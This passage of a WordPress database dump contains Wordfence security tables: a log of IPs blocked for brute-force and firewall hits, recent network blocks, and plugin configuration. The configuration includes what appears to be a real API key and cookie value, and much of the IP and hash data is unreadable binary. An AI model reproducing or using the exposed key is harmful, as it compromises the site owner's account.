�2','US',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���,X#','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q�','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Q�','DE',3,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν','GB',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν','GB',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν','GB',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν.�','SG',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν2�','DE',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν2�','DE',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν2�','DE',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν2�','DE',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν4�','DE',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0��νUX','SG',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��νUX','SG',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��νUX','SG',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��νUX','SG',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�','IN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�:','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ν�V','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���&V','US',3,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���&V','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���-�B','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���-�B','US',1,18863,'brute'),('\0\0\0\0\0\0\0\0\0\0���-�B','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���7�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���7�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���7�','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ψ.','AU',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛԛ','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛ�','DE',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ϛ�','DE',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴ�','DE',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��ϴΥ','DE',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0����V�','US',1,18872,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',2,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0������','US',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0�����q','US',2,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0�����q','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����q','US',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0�����q','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0�����4','US',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18859,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����','US',2,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',2,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���a��','US',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���m~','SG',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���m~','SG',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0���o\0:','US',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���q�','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���q��','US',1,18866,'brute'),('\0\0\0\0\0\0\0\0\0\0���q�u','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���q�u','US',1,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���q�u','US',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���q�u','US',1,18880,'brute'),('\0\0\0\0\0\0\0\0\0\0���q٤','US',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���q٤','US',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�','SG',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�','SG',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�','SG',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�','SG',1,18876,'brute'),('\0\0\0\0\0\0\0\0\0\0���a�','SG',2,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0���~�','US',2,18877,'brute'),('\0\0\0\0\0\0\0\0\0\0���~h','US',1,18854,'brute'),('\0\0\0\0\0\0\0\0\0\0���~h','US',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0��э6�','US',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0��џ�','US',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',2,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',1,18853,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���\rKz','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���9�8','ID',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0����tv','VN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���}z/','JP',3,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���}z/','JP',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���}z/','JP',4,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��ӕ��','CN',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���@)�','CN',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���S��','FR',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0���S��','FR',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���S��','FR',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���n\\�','MK',1,18864,'brute'),('\0\0\0\0\0\0\0\0\0\0���n\\�','MK',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0���n\\�','MK',1,18879,'brute'),('\0\0\0\0\0\0\0\0\0\0��ԁ\r�','FR',1,18883,'brute'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18866,'waf'),('\0\0\0\0\0\0\0\0\0\0�����','GB',1,18870,'waf'),('\0\0\0\0\0\0\0\0\0\0����L�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0����L�','DE',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����M','DE',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0���_�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��ՈH�','DE',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Ո]�','DE',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0��Օg�','ME',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0��իо','GB',1,18858,'brute'),('\0\0\0\0\0\0\0\0\0\0��իо','GB',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0���Ԅ/','IT',1,18869,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"d','IR',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0����\"d','IR',1,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0����e�','RU',3,18873,'waf'),('\0\0\0\0\0\0\0\0\0\0���%*2','US',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0��؞��','US',1,18874,'brute'),('\0\0\0\0\0\0\0\0\0\0�����1','US',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0����R','US',1,18855,'brute'),('\0\0\0\0\0\0\0\0\0\0���V�','UZ',1,18881,'brute'),('\0\0\0\0\0\0\0\0\0\0���B��','PS',1,18882,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18857,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0���F��','FR',1,18870,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٓ�','GE',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٓ�','GE',1,18862,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٮ�i','GB',1,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��ٮ�i','GB',1,18868,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18860,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18861,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',2,18865,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',2,18867,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18871,'brute'),('\0\0\0\0\0\0\0\0\0\0��ܧe','CN',1,18875,'brute'),('\0\0\0\0\0\0\0\0\0\0���y��','AU',1,18878,'brute'),('\0\0\0\0\0\0\0\0\0\0���','HK',1,18873,'brute'),('\0\0\0\0\0\0\0\0\0\0���','HK',1,18875,'brute');
/*!40000 ALTER TABLE `wp_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfblocks7`
--

DROP TABLE IF EXISTS `wp_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=InnoDB AUTO_INCREMENT=5391 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfblocks7`
--

LOCK TABLES `wp_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wp_wfblocks7` DISABLE KEYS */;
INSERT INTO `wp_wfblocks7` VALUES (5384,2,'\0\0\0\0\0\0\0\0\0\0���h,5',1631614603,'Blocked by Wordfence Security Network',1631614603,1,1631615203,NULL),(5385,2,'\0\0\0\0\0\0\0\0\0\0���ً',1631614765,'Blocked by Wordfence Security Network',1631614765,1,1631615365,NULL),(5386,2,'\0\0\0\0\0\0\0\0\0\0���]�`',1631615023,'Blocked by Wordfence Security Network',1631615023,1,1631615623,NULL),(5387,2,'\0\0\0\0\0\0\0\0\0\0��g	��',1631615094,'Blocked by Wordfence Security Network',1631615094,1,1631615694,NULL),(5388,2,'\0\0\0\0\0\0\0\0\0\0��_o��',1631615398,'Blocked by Wordfence Security Network',1631615398,1,1631615998,NULL),(5389,2,'\0\0\0\0\0\0\0\0\0\0��]r��',1631615505,'Blocked by Wordfence Security Network',1631615505,1,1631616105,NULL),(5390,2,'\0\0\0\0\0\0\0\0\0\0�����S',1631615716,'Blocked by Wordfence Security Network',1631615716,1,1631616316,NULL);
/*!40000 ALTER TABLE `wp_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_wfconfig`
--

DROP TABLE IF EXISTS `wp_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_wfconfig`
--

LOCK TABLES `wp_wfconfig` WRITE;
/*!40000 ALTER TABLE `wp_wfconfig` DISABLE KEYS */;
INSERT INTO `wp_wfconfig` VALUES ('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminUserList','a:1:{i:1;i:1;}','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:2:{i:0;a:2:{s:9:\"timestamp\";i:1631683800;s:4:\"args\";a:1:{i:0;i:1631683800;}}i:1;a:2:{s:9:\"timestamp\";i:1631943000;s:4:\"args\";a:1:{i:0;i:1631943000;}}}','yes'),('apiKey','49dabe6e1a73a86a2353d51f2f64786a8e6780c5b700aa31d2b60313571b6e1f575fa9f36865050497a2acb7d0459eae206c9ec6ec179ac15d869ffd308a7061ccf345f5a16513a8ac5e038a8535be6c','yes'),('autoBlockScanners','1','yes'),('autoUpdate','0','yes'),('autoUpdateAttempts','0','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','60d1b9630ae73','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','�\0\0\0\0\0\0\0\Z��a:2:{s:4:\"hash\";s:64:\"c947153e029a74c6d8d1caa85e4aec46022fe0152ffb1dfc23ea508d9e9fe9c4\";s:6:\"hashes\";s:136448:\"\0���W7���ht#�	��q��)��d��$\0��\0(�띰xJ{�h�Ϯ�%��\r^��:��(�5��\0(����Z�Y�Y�@�Iq��ȗ#��T��@\04ߗ�t��\\v�Q�޹��\'_���ajx�Ҧ�\0E=j���ȋ|�p8.�½���֤��SGp�\0Eq�x����Pa���>bv�D��o4V�G;a<��\0^N��弘a�e|K��-��ܰ��ɜ=�\0b�&F�����%|w��*Qr;�|/�=(A���<�\0���#�B�5��j��$#��j!����bN��j�\0�ۧ��4(�K�I|���0��qD.^�v�\0�>|�;(߯\\W*�7?��\n�N��2=�7[Uo\0��i��ք�\"����]�^��XD��2](\0���/��o)��:4]��_���+̔�c���\0�e�*�@�t���\"��q	ȐN��5��H�\0�9�w�i����5�������}���h��\0�Z̈�~�0�=��G�#�C��Z}�*��p\0�T|̅_��S�8��O0μ�¸0����6�\0��-bs�G�\n(hr\Z.�n���!e��z.Yx��U�i��5G���$P�u�v�AT����p�l�J��}���a\Z�\0VX=:��8~\"2�ʦD�I�XV�f�EW��e���G�]���q)6��	�j��nNؤ^}0[P�KXs��+ȉa�w�S���[�U`|WS�PD�羟Nh��b!���#�8i�>kq6�R�E�5��:�\"��;B��i.qX��A4����uU��+ױ���ϱ��T�_^gy�zG�L\"1����U}6:��l|��(㜦��q{��V�~u�<�Dh�o*���cϬ0���x�cl$�	�4��m����o��`vA:����`{rf��_�S3/s��m�?d�^͔0�X0�#q��-ml�*��#T�c��x�E��ƒy�ũ��H���>��$�2��]�%��*�6�\\�dp�ۛ!��s%��]Z�Y�o�ݿ���������r;G�\"��Gu���&�w]�-H�\rRW��\\�5����\'��=�P�����sZF�ԤoD-x?�<�u���q�XQ�7ai�\rIC�pE�K����y��k�ѩ}ˣ�\\�$�p\"�&�p+^���\Z�{�����˜�5�|�f�㵅S�L�o3E�x���ѥU��q�`�q4u���Z����[n�8�O��r7��0H01YL$RRAhJ6��M�w:/�7�.�ڏP���h.B�U-ї�\'Ts��z+p����pHa�P0�4��D�!�2�{�F�͹|���p8$�h��\"d�3���\\��pY�Q�ᣎ�K4ޗ��غ�Ku�\0M�x>]Z�\"�z�8Ŏ�V�M�˻yUL���K��C�Wa��\\��ˁ�\n�;�0�Ġ\"f�АΟ��\'\r͍��D�dM������s�ǿ��ڴ�$2�j)�,\n�\' #6�9\n����ږ��mK�2�e�f�te�4���\Z�GG.�f��Vy`��)\".o[`�ϐ�\r�n���jn�viU\n@,�+!%u	re4�+JuP$,�WN��P�2�\"Ş�,|^��y޲���/\Z(A�1]�/ƅ�B�M�j:��@ѫ�G+S�f�����dV�i�\n�6W��ԑ\\<�O�Ej2�Q����\r�|�X6�����/46�J���?���X�GX�~��u���ic\r�p�����Q��활��\r?c�L�Tӊ���qg�ȫ?c�r�ȸ�t�d���B\rTJ�,Q��$�TDh���((Zd�z��vO����_��;ƀ��E�pY�.�&}��_�	�Q�������oS�nn�̵v�\0)�������Ӥ�:DILV�\0y�Z��)��K�\n��ܘD�~��%Ro��c��7�\r��L��>1�݈]�^]�RɢNF�M��J�,��i�I.2 ��>1�Z�;ר��1ԁ$�!��W:	�Sx�Dq5��/w��_W:��+f�1z��g���\\Y��m�x�GO0���jo].㖽�B�=�f~:N���Fa6�ա�\nY ���\'��i���+�`��fGYbm��UP��M��J�ڡ0�&Cv��M�$����O��4-K�	o6�lb�1E�;�7x�?�-�DZ��Z�zE���*�nk���E�m@������1s��Y�#1$��\Z�=I�����b��XBr�?���ͥ-�!�i�>�[��e�V{�W�!F�P�b<&„A����8�`��]wB�κ��@kp&���h4ԛ�2����f\'�G���IS��}�}R⥅�JЛZ[`�m��I�$=�����D��֛&�Ǿ@�+բ��qO.���x&��*p���@��l����Β/kz=�i���� S����\Z\Z4ڶ1�5���2�3\r#?E�Q���L��Im$�Z��B\Z�!��&�͖��Ck�`7���\'/��]�i��5�\0�����2SC���+2��f!Og�ve�C�h����%%��-��)^\\���\0�t`�k��@���U�OŔ�cp��>�!8HB6������=�b���!��n�z\0�OS~K��|$��T����lJ�b�Ow������f\nT����Eg\ZU�\r����l{��SYD7I�.`��Ï}#٧���JKN��e�ӌ��&��ЎuѡIq�t���n~T	_j��-����%��?�7�0i���}�e�iZ�O�&E+rX�e�{e��mX��<�:�KSy{��r�>K^s�VS2o�H֏�_��)7�����z_oe���ŭy�^/?h;@r�K%��LP��f��c�(|�_]��U�͒o~ME��������s��Rp�d��F[��\'r�5l���蔝媀���s��@Z2]��i���](J~n�3��ϝ�ـ�hj��q�o�2��kL��JQ�c\0�8|V��A�����Nں�)\r�m�MA���D��os,����$���gJ	�Ŗ�7l}�a�������w|�gRLh!���1�R�&\'��k�D\':8YިK�Aa�-�RH�T���������(:�=ߤ\'\\�\0���|�8�(��]x�Z���vJ+�~�S�$ً6��vg�Aќ�ʋQ?�j�`J��N�]�0&��b�\0�V?9�����\"�.�I3�2r)rk�+`�NiM��2]<�	�h\n�˥���O��3�5F���\\�\0���,vS��+p\n�.����\r�J*RT	�!��A&��U�B�tG=_:\\�]>i��?η@ڹ�aKպ�*��Խ+]���ҮgƉ^62�G��\r�S��|�;)�$=X�n!����l=�@�A����:�V56U�x5�Px���&�:V�V��-qX��A9�M�4��-����t\n{���}�MI	AE0N������.T0b([���������oYd��%� �+�[�B��� f�<3)|���y-�d�����]`,5��l9�o���x��;����xZ���q@���51a�Ix���MOY�U�\r�Z�t�Kϭ�uJOyŹ�&Ҹ��*�ܲ�us#��t1��#4����䂹\Z��\'&�8�\0������m9;:��ͼ�f��f�)���I�;��Poi���=�DᎯ�0Sl�hsgܺ{�,��)\Z|����<�\n�x��*����i����`��h��`�P��*ͤ�!j1m!�~�J��\r�O�]��Y<�y�}�\Z�>ɺH���I|��P�����Bb��e�^��Έ;VT1��cj�] k^�O��9�A9�/�\Z�%�@b�.�`�� po��df��?�jr��Y��e|�H��h>�,�ec���R�es5-���D=��<��:3��ϩ�M���>���r�6�Ԥ��%z�uۇ7�}�F���[yx��]k��ݭ�Yr����9�IV,C2�\"���V�l��p�]l2�P�f>�Kp��֚J���bvw�`���*�w��}����*ʘ��)>2�q��e��^�)�P����n�GfR�@Ol,>iv�:�`�tQ�*�8\'�<��\n����J���;�H`�Q؝6pq���a�%��\r��	��\"�A�n�3H�Is�:Y��a�e0BҲy�Pp\nﭾ�����!Λ���&��Ʌ\'M��4�B�S���+\'�4&�$ء��Vgg��o��g~��m/�/&t+���s�����\"#:Z�ܯ4㓉&_&���6\"xF�|w`AZ_+vL\r}��N�P���6������_��Ұ�ݾ��l2�b���qÜ$U�v��	l,s���\"\r�m��`��Yד�U��X^�Ms���6R�H@�	&�冾�B�x��@d�R#U��O�Pg��sH�o�)n��Wr��t�Z�M���?%���V���D��Fv�@�����*9V���μ�[E��Bu}<�\Z#�d�4*�?���d�Q]Bx.|9D��:h@��Q��/U\0-|_ۢ1�g-�+����}�Ԙ!^iB���J��\\W�]�f��@@�w�=	.]��kZ1љm�G���]�x�0���	14\"1�Ix��GL�[	���>(G�A:���	64���� �2DM�M�$�\r澐i�\0���	8\\Ŭ�j�A��ʔ5�+X���o�T�m�_|	M��yu$�1�ck_�K�o�f��m���%�	g)[.�r\n�o�i�{4��Q\n\r8H�\rfX��	v�l���ٮ�!��P��m���\n6|ϔK	~�C�ȫ��7���:��s&u����j��t	�+�{R���ل���n�t,�Ǟ�`���|U�	�	��#t�̹��p=�I\"����)F	֓���-�\nqU��i���-�$�h*��m�l	�Vh���LC��»>U�8.�`�@<K��h	�Ϳ��U%�O�Hޡ�@�~x\\6��~�\n<�:�X�h�QAT����o��p2���8>�\n*��<��ӳ�?HM��\'V���L�\'[R�\n�@&��[DqS�������B��N#F�B��\n*An���.]�B��t�v�!�WҧMw�9�F\n+P_tQ�Vo����7n�\nz#�8�����J\nGk��~ng��m.�3\\�\n��1i��jgָ�\nv�?�u�	���f�h6�2B���?�2\03�}�\nx��m���nV=OD��\0T���)��U��\n}.�����v�e�\n�?�.z��E����+ɡ\n��\\_9(�)7�\n��/�S��\'�g߃�v���\n�9d���g��~@���|�B-�����ڐ�6=��\n�T�[Cp����(,�_V+�L\rۨI��(.��\n�s�H��чc �-y//�?�\r�$M̤j3\n�aqYK�JҔ΀p�\ZJ�j��\\P���\n�\n��ڷ�tn�\r�Ean�J;}(��ҙ���.��9\n�X:��Q�}�+�O�\\�_�	{�ܓC\'a�y:��\n�� �W\"���w�\05�S Nr������h\n�C��0�pFd���l�\0��\"u�~2\"�T��p\Z\n�v�[\0���XZppi�.��c�;~&���\n���&�)h4�_`�F�L��<��:`#pf���\n����RW#ވ� �Q��ē4E[�\'�z�\r��)��k���O�dS0�X�z���_����61k��K(��]1�z�ukpR�!������YC8���`dfh�.^8����!{��F�N�L{��z�)��,�\"�w�W�S��JDz���K�S����uᾒ�M��cc���cdD�(�Q��\\�\ra�[�J?T���?��G�d��(s������t�BUI+u���C�����R����SF2>�3`��v��\'�:js(��-N���֠����N�3����:�VS;���CT\n��]���C�rJ�2����m5CZ�\0�/@@1�1�D�ծ6��8g\n)e���z��l�1�MH��&��S��.>�U�B|2��ӜOU}��(԰�tc�2��ĒZV�R�顃[��l#4���>1ε��E���l|lh�����]���:�Yň�3	����\\gm̻�1)q+#���b�^0rR_Ҳ��Yn,��J�����́�T�NB�(�-��g��\\ICڞ�:r�n�̿�>Tw�D\n�Q�!�@iD��r��ȭ!wz��L{��J�y7-�m���G鴞Y�[����k��En#Xv�i�w�R��:�M�7K�kR��D����.�� L9��%�S���J*����n\'ͪt^���Vɹ�O�����*�(�����7Y��(V��z|%\0\'j����l���ص�$h�TC���՞N�8k�Ⱥ��y�*�<I\n����(���x�$���C\n��m�-B�����YVAlͼ2�VS�#n���X����6��X����DU�T�=��1O�@�,x�������� �)���\r�&�d5�s/,�\"�d��w22���\r��މ#<*Q�f��(�����\r%�P����cW�-:\'2�U�\'Ft�ݩz\r1?�;IB�=S��\Z�2֥͐�&�׆Z�B���\r5C�ٖ��N��s��k��l�\'t35����\rN��I�Y�����ԯ!���6)��I�Y\rQi�^�\ZB|��f��C���-/r��U�Y٢�B\rX�[cdpSs3�%.X��|A���w��#(JL\ra�{p�9����(A�)ˡ�̮SPV��s�6�#i\rnu���:Ft\Z��\"P9���qP���R��PA�\r���k�<vW�P�v��g(Hт��c�+d7\r�Y�t�W^���}rIxۯ�u��$�/dMk�\r�U��:�w����,���&�K�p&�\Z���\r�7Gٛ�r�Xyl�ﳠ<U5p8�n��\r›��Xd	D\n����q�bc�\Zu��\rٓ��C7,��<��p�,�L��~rY�s#�\r�\"�(qq�6�ZN��������ş&�h��\r�\n���*J��6������V^��%W\\�y�\'�h?I��I��3z(B�GQ#��`p�S:eJ�&�/�ʝ�aɋ��`�\n�}��\Z\\x�+�G\\%R���O��6���}�㕓悫�-�F�kRV��6���G_e\r��\"�}�Q^u�����YtY���sNl�dU|�7��t�U�FY���n�a�IWRH�j�wHBB����u�Xp\0b�Ue�$OrΰYe�JX�p�W	!��L�	o�Ѧ�?��11����]�Q[��7*�a�3�Ǿ�h��,�U���c�\\�ki����6u��J\n3*��Kv�i��A�&�4���=�D��q!蓸֧f;4��P�Z��e�O!�vx.e��8�jY�����0\Z����P�P1��S/���0�?�U!�͝�������6�??��Z��v�w=2H:�)x.���o\\��J��t�LU��o���L��~��)6�K�5S$ʂ8����⡧5g�g7�3lsuؾ�y���Z�wڠ�0YE\0����身i\\���|�����7��wq��;,r���L�X������\\35qv.R߼h<<���t�hD�$��\\1l$y�,��`p�M��j]#�W�B�Tm����F�M�(�b;ˏ�K���g�&\n�-��nzEja �#�[՝YdIdf@\\�K2o��؂/*�~�Hw�c@�2��,�����P�0������x`Ձ���dZvs�.��k�����\Z�5�\0��yX��$�j뤋��I��8���@t=��{9v��>:̷M\Z�ϵ����\rBt�\r�����3��i��0bn��j:�$L �g��r�a���������t��C �Y�\n��H���$$�T�̞}^�pfO]�ǭN3�%\r\\��-�A�J�K��K���7P�xe�\'�PH���H�P=,���L���N��}�\Z�E�O\\0�u��FOR\Z)ā���;S�\'bN<v�w�LSڻ�sT���|�>Q����i}�G�D���7��OF5�B�Nov���:A�_-3��x\ZJ�B�@k�y50���\n��Q�(��;�4�.���`R��w�|lS�Pp�k�G�M�8�����Թ��f�E�x;˝���O�[����J`uO�v&_���-]����E��;|��x$���(�t`\"���/\Z=�`>&�oR�֫��	�ڲ��}�Z	w�%��(�4)�;\r��;�)6qi9C��2��t�d64�Kծ�A�U)۳!���Pdlw�+���>�;��O��-L��hy��ML)\\VH��3_@AJ!�_��drN�d�G��;�Ϸ�6�<���wj�;�V��4dk�Է܏>�D��j�,p��k~*����d}�[����H�?�iK�[�i��/�(����^��\\���4��c-��Ȝ��)�͗�۷���@c.�V_;q���:uM���X���bW��